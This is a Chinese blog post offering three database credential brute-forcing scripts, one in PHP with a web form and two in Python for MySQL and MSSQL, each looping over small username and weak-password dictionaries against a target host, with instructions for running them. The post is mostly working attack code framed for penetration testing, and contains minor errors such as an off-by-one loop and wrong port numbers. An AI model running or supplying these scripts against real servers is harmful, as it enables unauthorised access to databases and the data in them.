数据库账号密码猜解脚本PHP版+Python版
一、Mysql PHP版本爆破小脚本(注意:从代码可以看出用户名是个变量,一般数据库账号不会变,所以用户名没用数组作为字典。密码是用数组作为字典。字典可根据规矩扩展,破解的成功与失败,就看你扩展的字典强大不强大了。用法:保存代码为MysqlDatabaseBlasting.php,浏览器打开就可使用。 )
/*
* author:Bearcat 2016-10-5
*/
<html>
<head>
<title>Mysql账号密码爆破工具</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<center>
<br><br>
<h1>MysqlDatabaseBlasting(Mysql账号密码在线爆破工具 V1.0)</h1>
<br>
<?php
if(@$_POST['submit']){
$host = @$_POST['host'];
if($host!=""){
$username = "root";//用户名字典
$password = array('','123456','admin','root','ccf304vn'); //密码字典
echo "<hr><br>--------------------爆破状态--------------------<br>";
echo "密码错误次数:";
for ($i=0; $i <= count($password); $i++) {
if(@mysql_connect($host, $username, $password[$i])){
echo "<br><br><font color='red'>爆破成功--密码-->".@$password[$i]."</font>";
break;
}else{
echo $i."、";
continue;
}
}
echo "<br>--------------------爆破结束--------------------<br><hr>";
}else{
echo "<script >alert('黑客,输入数据库IP地址')</script >";
}
}
?>
<br><br><br><br>
<form action="MysqlDatabaseBlasting.php" method="post">
数据库IP地址:<input type="text" name="host"/>
<input type="submit" value="爆破" name="submit"/>
</form>
<center>
</body>
</html>
演示:
二、Mysql Python版本爆破小脚本,需要安装Python插件MySQL-python.exe,可以看出代码量很少,(注意:里用户名和密码都是类似字典。用法:保存代码为MysqlDatabaseBlasting.py,cmd切换到 MysqlDatabaseBlasting.py路径下,并 执行 MysqlDatabaseBlasting.py即可开始破解 )
import MySQLdb #coding=gbk #目标IP mysql数据库必须开启3360远程登陆端口 mysql_username = ('root','test', 'admin', 'user')#账号字典 common_weak_password = ('','123456','test','root','admin','user')#密码字典 success = False host = "127.0.0.1"#数据库IP地址 port = 3306 for username in mysql_username: for password in common_weak_password: try: db = MySQLdb.connect(host, username, password) success = True if success: print username, password except Exception, e: pass
演示:
三、Mssql Python版本爆破小脚本,需要安装 MSSQL-python.exe 可以看出代码量很少,参考二的用法
import pymssql common_weak_password = ('','123456','test','root','admin','user')#密码字典 mssql_username = ('sa', 'test', 'admin', 'mssql')#账号字典 success = False host = "127.0.0.1"#数据库IP地址 port = 1443 for username in mssql_username: for password in common_weak_password: try: db = pymssql.connect(server=host, port=port, user=username, password=password) success = True if success: print username, password except Exception, e: pass
说明:看到很多网络安全爱好者,在进行渗透测试的时候,遇到数据库可以远程管理,但是无法破解其账号密码,所以此篇文章就推送几个脚本进行渗透。
![[PHP8] 我参加了PHP8工程师认证初学者考试beta考试](https://file.lexue001.com/www/202303/08/115219106.gif?x-oss-process=image/auto-orient,1/resize,m_fill,w_125,h_98/quality,q_90)
